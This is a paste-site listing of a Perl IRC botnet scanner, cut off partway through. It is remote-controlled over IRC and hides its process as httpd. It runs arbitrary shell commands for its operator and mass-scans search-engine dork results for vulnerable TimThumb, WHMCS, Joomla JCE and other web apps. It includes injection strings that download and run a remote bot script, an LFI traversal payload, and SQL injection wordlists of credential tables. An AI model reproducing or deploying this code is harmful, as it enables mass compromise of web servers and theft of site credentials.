Bot Scan IRC + JCE

From x, 3 Years ago, written in Perl, viewed 3'938 times.
URL http://paste.security-portal.cz/view/a1205e99 Embed
Download Paste or View Raw
  1. #!/usr/bin/perl
  2.  
  3. use HTTP::Request;
  4. use HTTP::Request::Common;
  5. use HTTP::Request::Common qw(POST);
  6. use LWP::Simple;
  7. use LWP 5.64;
  8. use LWP::UserAgent;
  9. use Socket;
  10. use IO::Socket;
  11. use IO::Socket::INET;
  12. use IO::Select;
  13. use MIME::Base64;
  14. use URI::Escape;
  15. use Digest::MD5 qw(md5_hex);
  16. #use DBI;
  17. #use DBD::mysql;
  18.  
  19. my $datetime    = localtime;
  20. my $fakeproc    = "/usr/sbin/httpd";
  21. my $ircserver   = "irc.jatimcom.net";
  22. my $ircport     = "6667";
  23. my $nickname    = "lol";
  24. my $ident       = "lol";
  25. my $channel     = "#coli";
  26. my $chanxxx     = "#coli";
  27. my $chanxx1     = "#coli";
  28. my $chanxx2     = "#coli";
  29. my $chaninfo    = "#coli";
  30. my $submitchan  = "#coli";
  31. my $admin       = "lol";
  32. my $fullname    = "9,1[4!9]15[scanner] BoUnCeR's JcE VersioN ";
  33. my $rawmsg      = $ARGV[4];
  34. my $msgraw      = $ARGV[5];
  35.  
  36. my $nob0dy      = "9,1[4!9]15[scanner] BoUnCeR's VersioN ";
  37. my $whmcslogo   = "9,1[4!9]15WHMCS 4<9=4> ";
  38. my $thumblogo   = "9,1[4!9]15TimThumb 4<9=4> ";
  39. my $zerologo    = "9,1[4!9]15zBoarD 4<9=4> ";
  40. my $lfilogo     = "9,1[4!9]15Lfi 4<9=4> ";
  41. my $rfilogo     = "9,1[4!9]15Rfi 4<9=4> ";
  42. my $xmllogo     = "9,1[4!9]15Xml 4<9=4> ";
  43. my $oscologo    = "9,1[4!9]15Osco 4<9=4> ";
  44. my $oscosqllogo = "9,1[4!9]15O-Sql 4<9=4> ";
  45. my $e107logo    = "9,1[4!9]15E107 4<9=4> ";
  46. my $ihlogo      = "9,1[4!9]15Is-Human 4<9=4> ";
  47. my $zenlogo     = "9,1[4!9]15ZenCart 4<9=4> ";
  48. my $rfglogo     = "9,1[4!9]15RfG 4<9=4> ";
  49. my $mmfclogo    = "9,1[4!9]15MmFC 4<9=4> ";
  50. my $avmlogo     = "9,1[4!9]15AVM 4<9=4> ";
  51. my $sqllogo     = "9,1[4!9]15SqL 4<9=4> ";
  52. my $carilogo    = "9,1[4!9]15Find 4<9=4> ";
  53. my $jcelogo     = "9,1[4!9]15JCE Exploiter4<9=4> ";
  54. my $jnewslogo   = "9,1[4!9]11JNews 9<4=9> ";
  55. my $jinclogo    = "9,1[4!9]11JINC 9<4=9> ";
  56. my $letterlogo  = "9,1[4!9]11JnewsLetter 9<4=9> ";
  57. my $redmistyclogo       = "9,1[4!9]11RedMystc 9<4=9> ";
  58. my $phpvmslogo  = "9,1[4!9]11PhpVms 9<4=9> ";
  59. my $clipbucketlogo      = "9,1[4!9]11ClipBucket 9<4=9> ";
  60. my $maian15logo = "9,1[4!9]11Maian15 9<4=9> ";
  61. my $findlogo    = "9,1[4!9]15JCE Finder4<9=4> ";
  62. my $whmcscmd    = '!whmcs';
  63. my $thumbcmd    = "!timx";
  64. my $zerocmd     = "!zero";
  65. my $lficmd      = "!lfi";
  66. my $rficmd      = "!rfi";
  67. my $xmlcmd      = "!xml";
  68. my $e107cmd     = "!e107";
  69. my $zencmd      = "!zenc";
  70. my $ihcmd       = "!ishu";
  71. my $oscocmd     = "!osco";
  72. my $cmdlfi      = "!cmdlfi";
  73. my $cmdxml      = "!cmdxml";
  74. my $cmde107     = "!cmde107";
  75. my $rfgcmd      = "!rfg";
  76. my $mmfccmd     = "!mmfc";
  77. my $avmcmd      = "!avm";
  78. my $sqlcmd      = "!sql";
  79. my $ftpcmd      = "!ftp";
  80. my $jcecmd      = "!j";
  81. my $jnewscmd    = "!jne";
  82. my $jinccmd     = "!jinc";
  83. my $lettercmd   = "!lett";
  84. my $redmistyccmd        = "!red";
  85. my $phpvmscmd   = "!vms";
  86. my $clipbucketcmd       = "!cbk";
  87. my $maian15cmd  = "!m15";
  88. my $findcmd     = "!find";
  89. my $spreadMode  = 1;
  90. my $zerowget    = 1;
  91. my $zerolwp     = 1;
  92. my $zerocurl    = 1;
  93. my $gps         = 1;
  94. my $gps2        = 1;
  95. my $timot       = 10;
  96. my $silentmode  = 1;
  97. my $rceinjector = "http://www.victorparts.fr/vp31/fullscreen/iam.php";
  98. my $hostinjector = "bouncer.freehomeschoolads.com";
  99. my $thumbid = "http://".$hostinjector."/bad.php";
  100. my $botdid = "http://".$hostinjector."/load.php";
  101. my $botxdid = "http://".$hostinjector."/xcrew.php";
  102. my $thumbshell = uri_escape($thumbid);
  103. my $md5php = md5_hex($thumbid).".php";
  104. my $md5bot = md5_hex($botdid).".php";
  105. my $md5botx = md5_hex($botxdid).".php";
  106. my $botid = uri_escape($botdid);
  107. my $botxid = uri_escape($botxdid);
  108. my $injector = "http://".$hostinjector."/bad.txt";
  109. my $botshell = "http://".$hostinjector."/bot.txt";
  110. my $subticket = "/submitticket.php?step=2&deptid=1";
  111. my $action = "/data/lobex.php";
  112. my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;wget%20http://www.ecclescenter.org/bot.log;perl%20bot.log;rm%20bot.log";
  113. my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;lwp-download%20-a%20http://www.ecclescenter.org/bot.log;perl%20bot.log;rm%20bot.log";
  114. my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;curl%20-C%20-%20-O%20http://www.ecclescenter.org/bot.log;perl%20bot.log;rm%20bot.log";
  115. my $uagent    = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
  116. my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
  117. my $jpath       = "/includes/js/tabs/errors.php?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
  118.  
  119. my $jack1 = "http://barakcement.com".$jpath;
  120.  
  121. my $jack2 = "http://www.scrooser.com".$jpath;
  122.  
  123. my $jack3 = "http://iae-indonesia.com".$jpath;
  124.  
  125. my $jack4 = "http://flyarab.altervista.org".$jpath;
  126.  
  127. my $jack5 = "http://blackhaircafe.com".$jpath;
  128.  
  129. my $engine      = "JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,
  130.                                 JacKES,JacKUK,JacKUS,JacKJP,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,
  131.                                 JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam";
  132. my @tabele      = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
  133.                                 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
  134.                                 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
  135.                                 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
  136.                                 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  137.                                 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  138.                                 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
  139.                                 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
  140.                                 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
  141.                                 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  142. my @kolumny     = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  143.                                 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  144.                                 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
  145.                                 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  146.                                 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  147.                                 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
  148.  
  149. $SIG{'INT'}   = 'IGNORE';
  150. $SIG{'HUP'}   = 'IGNORE';
  151. $SIG{'TERM'}  = 'IGNORE';
  152. $SIG{'CHLD'}  = 'IGNORE';
  153. $SIG{'PS'}    = 'IGNORE';
  154.  
  155. $ircserver = "$ARGV[0]" if $ARGV[0];
  156. $ircport = "$ARGV[1]" if $ARGV[1];
  157. $nickname = "$ARGV[2]" if $ARGV[2];
  158. $channel = '#'."$ARGV[3]" if $ARGV[3];
  159. $0 = "$fakeproc"."\0" x 16;
  160. my $pid = fork;
  161. exit if $pid;
  162. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  163.  
  164. our %irc_servers;
  165. our %DCC;
  166. my $dcc_sel = new IO::Select->new();
  167. $sel_client = IO::Select->new();
  168. sub sendraw {
  169.     if ($#_ == '1') {
  170.     my $socket = $_[0];
  171.     print $socket "$_[1]\n";
  172.     } else {
  173.         print $IRC_cur_socket "$_[0]\n";
  174.     }
  175. }
  176. sub connector {
  177.     my $mynick = $_[0];
  178.     my $ircserver_con = $_[1];
  179.     my $ircport_con = $_[2];
  180.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  181.     if (defined($IRC_socket)) {
  182.         $IRC_cur_socket = $IRC_socket;
  183.         $IRC_socket->autoflush(1);
  184.         $sel_client->add($IRC_socket);
  185.         $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  186.         $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  187.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  188.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  189.         nick("$mynick");
  190.         sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
  191.         sleep(1);}}
  192.  
  193. sub parse {
  194.     my $servarg = shift;
  195.     if ($servarg =~ /^PING \:(.*)/) {
  196.         sendraw("PONG :$1");
  197.     }
  198.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  199.         if (lc($1) eq lc($mynick)) {
  200.             $mynick = $4;
  201.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  202.         }
  203.     }
  204.     elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  205.         nick($mynick.int(rand(5)));
  206.     }
  207.     elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  208.         $mynick = $2;
  209.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  210.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  211.         sendraw("MODE $mynick +Bx");
  212.         sendraw("ns identify sob3r3kon");
  213.         sleep(3);
  214.         sendraw("JOIN $channel correct");
  215.         sendraw("JOIN $chanxxx mejen");
  216.                 sendraw("JOIN $chanxx1 mejen");
  217.                 sendraw("JOIN $chanxx2 mejen");
  218.         sleep(1);
  219.         sendraw("PRIVMSG $channel :9,1[4!9]15 Hacker BoUnCeR A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
  220.         sendraw("PRIVMSG $chanxxx :9,1[4!9]15 Hacker BoUnCeR A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
  221.         sendraw("PRIVMSG $chanxx1:9,1[4!9]15 Hacker BoUnCeR A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
  222.         sendraw("PRIVMSG $chanxx2 :9,1[4!9]15 Hacker BoUnCeR A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
  223.         sendraw("PRIVMSG $admin :Hi $admin im here with you ! Sir!!");
  224.     }
  225. }
  226.  
  227. my $line_temp;
  228. while( 1 ) {
  229.     while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
  230.     select(undef, undef, undef, 0.01);
  231.     delete($irc_servers{''}) if (defined($irc_servers{''}));
  232.     my @ready = $sel_client->can_read(0);
  233.     next unless(@ready);
  234.     foreach $fh (@ready) {
  235.         $IRC_cur_socket = $fh;
  236.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  237.         $nread = sysread($fh, $ircmsg, 4096);
  238.         if ($nread == 0) {
  239.             $sel_client->remove($fh);
  240.  
  241.             $fh->close;
  242.             delete($irc_servers{$fh});
  243.         }
  244.         @lines = split (/\n/, $ircmsg);
  245.         $ircmsg =~ s/\r\n$//;
  246.         if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  247.             my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);                     
  248.             if ($path eq $mynick) {
  249.                                 if ($msg =~ /^PING (.*)/) {
  250.                                         sendraw("NOTICE $nick :PING $1");
  251.                                 }
  252.                                 if ($msg =~ /^VERSION/) {
  253.                                         sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");
  254.                                 }
  255.                                 if ($msg =~ /^TIME/) {
  256.                                         sendraw("NOTICE $nick :TIME ".$datetime."");
  257.                                 }
  258.                                 if (&isAdmin($nick) && $msg eq "!die") {
  259.                                         &shell("$path","kill -9 $$");
  260.                                 }
  261.                                 if (&isAdmin($nick) && $msg eq "!killall") {
  262.                                         &shell("$path","killall -9 perl");
  263.                                 }
  264.                                 if (&isAdmin($nick) && $msg eq "!reset") {
  265.                                         sendraw("QUIT :Restarting...");
  266.                                 }
  267.                                 if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  268.                                         sendraw("JOIN #".$1);
  269.                                 }
  270.                                 if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  271.                                         sendraw("PART #".$1);
  272.                                 }
  273.                                 if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
  274.                                         sendraw("NICK ".$1);
  275.                                 }
  276.                                 if (&isAdmin($nick) && $msg =~ /^!pid/) {
  277.                                         sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
  278.                                 }
  279.                                 if (&isAdmin($nick) && $msg !~ /^!/) {
  280.                                         &shell("$nick","$msg");
  281.                                 }
  282.                                 if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
  283.                                         sendraw("$rawmsg $msgraw ".$1);
  284.                                 }
  285.                                 if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
  286.                                         sendraw("PRIVMSG $rawmsg ".$1);
  287.                                 }
  288.                                 if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
  289.                                         sendraw("PRIVMSG $rawmsg :ACTION ".$1."");
  290.                                 }
  291.                                 if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
  292.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  293.                                         $newthumbcmd = $1;
  294.                                         $thumbcmd = $newthumbcmd;
  295.                                         &msg("$admin","$thumblogo9 Scan Command change to4 $thumbcmd ");
  296.                                 }}}
  297.                                 if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
  298.                                         $newzerocmd = $1;
  299.                                         $zerocmd = $newzerocmd;
  300.                                         &msg("$admin","$zerologo9 Scan Command change to4 $zerocmd ");
  301.                                 }
  302.                                 if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
  303.                                         $newwhmcscmd = $1;
  304.                                         $whmcscmd = $newwhmcscmd;
  305.                                         &msg("$admin","$whmcslogo9 Scan Command change to4 $whmcscmd ");
  306.                                 }
  307.                                 if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
  308.                                         $newtimot = $1;
  309.                                         $timot = $newtimot;
  310.                                         &msg("$admin","9,1 Get Content TimeOut change to4 $timot ");
  311.                                 }
  312.                                 if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
  313.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  314.                                         $newchan = $1;
  315.                                         $chanxxx = $newchan;
  316.                                         &msg("$admin","9,1 xChan change to4 $chanxxx ");
  317.                                 }}}
  318.                         }
  319.                         else {
  320.                                 if (&isAdmin($nick) && $msg eq "!die") {
  321.                                         &shell("$path","kill -9 $$");
  322.                                 }
  323.                                 if (&isAdmin($nick) && $msg eq "!killall") {
  324.                                         &shell("$path","killall -9 perl");
  325.                                 }
  326.                                 if (&isAdmin($nick) && $msg eq "!reset") {
  327.                                         sendraw("QUIT :Restarting...");
  328.                                 }
  329.                                 if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  330.                                         sendraw("JOIN #".$1);
  331.                                 }
  332.                                 if (&isAdmin($nick) && $msg eq "!part") {
  333.                                         sendraw("PART $path");
  334.                                 }
  335.                                 if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  336.                                         sendraw("PART #".$1);
  337.                                 }
  338.                                 if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
  339.                                         &shell("$path","$1");
  340.                                 }
  341.                                 if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
  342.                                         &shell("$path","$1");
  343.                                 }
  344.                                 if ($msg=~ /^!silent\s+(.*) -d/) {
  345.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  346.                                         $smod = $1;
  347.                                 if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
  348.                                 elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
  349.                                         &msg("$path","9,1[4!9]Silent Mode15 $silentstat !!!!");
  350.                                 }}}
  351.                                 if ($msg=~ /^!jackx\s+(.*) -d/) {
  352.                                         $engmod = $1;
  353.                                 if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }
  354.  
  355.                                 elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
  356.                                         &msg("$path","9,1[4!9]Jack Engine15 $gpsstat !!!!");
  357.                                 }
  358.                                 if ($msg=~ /^!engine\s+(.*) -d/) {
  359.                                         $engmod = $1;
  360.                                 if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
  361.                                 elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
  362.                                         &msg("$path","9,1[4!9]Multi Engine15 $gpsstat !!!!");
  363.                                 }
  364.                                 if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
  365.                                         $newhostinjector= $1;
  366.                                         $hostinjector = $newhostinjector;
  367.                                         &msg("$path","9,1[4!9]Injector 15change to4 $hostinjector ");
  368.                                 }
  369.                                 if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
  370.                                         my $url = $1.$lfdtest;
  371.                                         my $cmd = $2;
  372.                                         &cmdlfi($url,$cmd,$path);
  373.                                 }
  374.                                 if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
  375.                                         my $url = $1;
  376.                                         my $cmd = $2;
  377.                                         &cmdxml($url,$cmd,$path);
  378.                                 }
  379.                                 if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
  380.                                         my $url = $1;
  381.                                         my $cmd = $2;
  382.                                         &cmde107($url,$cmd,$path);
  383.                                 }
  384.                 ##################################################################### HELP COMMAND
  385.                                 if ($msg=~ /^!help/) {
  386.                                         my $helplogo = "9,1[4!9]15Help 4<9=4> ";sleep(3);
  387.                                         &msg("$path","$helplogo9Timthumb Vuln Scan:15 $thumbcmd [bug] [dork] ");
  388.                                         &msg("$path","$helplogo9RFG Vuln Scan:15 $rfgcmd [bug] [dork] ");
  389.                                         &msg("$path","$helplogo9RFI Vuln Scan:15 $rficmd [bug] [dork] ");
  390.                                         &msg("$path","$helplogo9LFI Vuln Scan:15 $lficmd [bug] [dork] ");
  391.                                         &msg("$path","$helplogo9XML Vuln Scan:15 $xmlcmd [bug] [dork] ");
  392.                                         &msg("$path","$helplogo9SqL Vuln Scan:15 $sqlcmd [bug] [dork] ");
  393.                                         &msg("$path","$helplogo9JCE Vuln Scan:15 $jcecmd [dork] ");
  394.                                         &msg("$path","$helplogo9JCE Finder:15 $findcmd [dork] ");
  395.                                         &msg("$path","$helplogo9Jnews Vuln Scan:15 $jnewscmd [dork] ");
  396.                                         &msg("$path","$helplogo9Jinc Vuln Scan:15 $jinccmd [dork] ");
  397.                                         &msg("$path","$helplogo9Jnewsletter Vuln Scan:15 $lettercmd [dork] ");
  398.                                         &msg("$path","$helplogo9PhpVms Vuln Scan:15 $phpvmscmd [dork] ");
  399.                                         &msg("$path","$helplogo9ClipBucket Vuln Scan:15 $clipbucketcmd [dork] ");
  400.                                         &msg("$path","$helplogo9Redmistyc Vuln Scan:15 $redmistyccmd [dork] ");
  401.                                         &msg("$path","$helplogo9Maian15 Vuln Scan:15 $maian15cmd [dork] ");
  402.                                         &msg("$path","$helplogo9e107 Vuln Scan:15 $e107cmd [dork] ");
  403.                                         &msg("$path","$helplogo9WHMCS Vuln Scan:15 $whmcscmd [dork] ");
  404.                                         &msg("$path","$helplogo9ZeroBoard Vuln Scan:15 $zerocmd [dork] ");
  405.                                         &msg("$path","$helplogo9osCommerce Vuln Scan:15 $oscocmd [dork] ");
  406.                                         &msg("$path","$helplogo9ZenCart Vuln Scan:15 $zencmd [dork] ");
  407.                                         &msg("$path","$helplogo9Tools:15 !ip [ip] | !port [ip] [port] | !dns [hostname] ");
  408.                                 }
  409.                 if (&isAdmin($nick) && $msg =~ /^!pid/) {
  410.                     &msg("$nick","6Fake Process/PID : $fakeproc - $$");
  411.                 }
  412.                 if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
  413.                     if (&isFound($thumbid,"GIF89")) {
  414.                         &msg("$path","9,1[4!9]Injector 4<9=4>9 Ready!!! ");
  415.                     } else {
  416.                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
  417.                     }
  418.                 }
  419.                                 if ($msg=~/^!bypass/){
  420.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  421.                                         my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";
  422.                                         my $cekby1 = &get_content($jack1."byroe");
  423.                                         if ($cekby1 =~ /byroe\.net/i){ $bystats1 = "9Up!!!"; } else { $bystats1 = "4Lost!!!"; }
  424.                                         my $cekby2 = &get_content($jack2."byroe");
  425.                                         if ($cekby2 =~ /byroe\.net/i){ $bystats2 = "9Up!!!"; } else { $bystats2 = "4Lost!!!"; }
  426.                                         my $cekby3 = &get_content($jack3."byroe");
  427.                                         if ($cekby3 =~ /byroe\.net/i){ $bystats3 = "9Up!!!"; } else { $bystats3 = "4Lost!!!"; }
  428.                                         my $cekby4 = &get_content($jack4."byroe");
  429.                                         if ($cekby4 =~ /byroe\.net/i){ $bystats4 = "9Up!!!"; } else { $bystats4 = "4Lost!!!"; }
  430.                                         my $cekby5 = &get_content($jack5."byroe");
  431.                                         if ($cekby5 =~ /byroe\.net/i){ $bystats5 = "9Up!!!"; } else { $bystats5 = "4Lost!!!"; }
  432.                                         &msg("$path","9,1[4!9]Bypass 4<9=4>15 JacK1=$bystats1 15JacK2=$bystats2 15JacK3=$bystats3 15JacK4=$bystats4 15JacK5=$bystats5")
  433.                                 }}}
  434.                 ##################################################################### SCAN
  435.                                 if ($msg =~ /!cari\s+(.*)/) {
  436.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  437.                                         my $find = $1;
  438.                                         &msg($path,"$carilogo9 Searching 15$find ");
  439.                                         &cari($path,$find);
  440.                                         } exit; }
  441.                                 }
  442.                         }
  443.                 if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
  444.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  445.                                         my ($bug,$dork) = ($1,$2);
  446.                                         my $simpan = 'situs.txt';
  447.                                                 if ($bug =~ m/^\//){ &msg("$path","9,1[4!9]Bug nya gak usah pakek \/ di depan :p "); exit; } else {
  448.                                                 if (&isFound($thumbid,"GIF89")) {
  449.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning TimTHumb on 4$path ");
  450.                                                         &msg("$path","$thumblogo9Dork 4<9=4>15 $dork ");
  451.                                                         &msg("$path","$thumblogo9Bugz 4<9=4>15 $bug ");
  452.                                                         &msg("$path","$thumblogo9Search Engine 4<9=4>15 Loading ");
  453.                                                         &se_start($path,$bug,$simpan,$dork,$engine,1);
  454.                                                         } else {
  455.                                                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit; }
  456.                                                         }
  457.                                                 }
  458.                                         }
  459.                                 }
  460.                 if ($msg =~ /^$whmcscmd\s+(.*)/) {
  461.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  462.                                                 my ($bug,$dork) = ("cart.php?a=byroe&templatefile=",$1);
  463.                                                 my $simpan = 'situs.txt';
  464.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning WHMCS on 4$path ");
  465.                                                         &msg("$path","$whmcslogo9Dork 4<9=4>15 $dork ");
  466.                                                         &msg("$path","$whmcslogo9Search Engine 4<9=4>15 Loading ");
  467.                                                         &se_start($path,$bug,$simpan,$dork,$engine,2);
  468.                                                 }
  469.                                         }
  470.                                 }
  471.                 if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
  472.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  473.                                         my ($bug,$dork) = ($1,$2);
  474.                                         my $simpan = 'situs.txt';
  475.                                                 if (&isFound($thumbid,"GIF89")) {
  476.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning LFI on 4$path ");
  477.                                                         &msg("$path","$lfilogo9Dork 4<9=4>15 $dork ");
  478.                                                         &msg("$path","$lfilogo9Bugz 4<9=4>15 $bug ");
  479.                                                         &msg("$path","$lfilogo9Search Engine 4<9=4>15 Loading ");
  480.                                                         &se_start($path,$bug,$simpan,$dork,$engine,3);
  481.                                                         } else {
  482.                                                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
  483.                                                         }
  484.                                                 }
  485.                                         }
  486.                                 }
  487.                 if ($msg =~ /^$zerocmd\s+(.*)/) {
  488.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  489.                                                 if (&isFound($thumbid,"GIF89")) {
  490.                                                 my ($bug,$dork) = ("zboard.php?id=byroe",$1);
  491.                                                 my $simpan = 'situs.txt';
  492.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning zboard on 4$path ");
  493.                                                         &msg("$path","$zerologo9Dork 4<9=4>15 $dork ");
  494.                                                         &msg("$path","$zerologo9Search Engine 4<9=4>15 Loading ");
  495.                                                         &se_start($path,$bug,$simpan,$dork,$engine,4);
  496.                                                         } else {
  497.                                                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
  498.                                                         }
  499.                                                 }
  500.                                         }
  501.                                 }
  502.                 if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
  503.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  504.                                         my ($bug,$dork) = ($1,$2);
  505.                                         my $simpan = 'situs.txt';
  506.                                                 if (&isFound($thumbid,"GIF89")) {
  507.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning RFI on 4$path ");
  508.                                                         &msg("$path","$rfilogo9Dork 4<9=4>15 $dork ");
  509.                                                         &msg("$path","$rfilogo9Bugz 4<9=4>15 $bug ");
  510.                                                         &msg("$path","$rfilogo9Search Engine 4<9=4>15 Loading ");
  511.                                                         &se_start($path,$bug,$simpan,$dork,$engine,5);
  512.                                                         } else {
  513.                                                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
  514.                                                         }
  515.                                                 }
  516.                                         }
  517.                                 }
  518.                 if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
  519.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  520.                                         my ($bug,$dork) = ($1,$2);
  521.                                         my $simpan = 'situs.txt';
  522.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning XML on 4$path ");
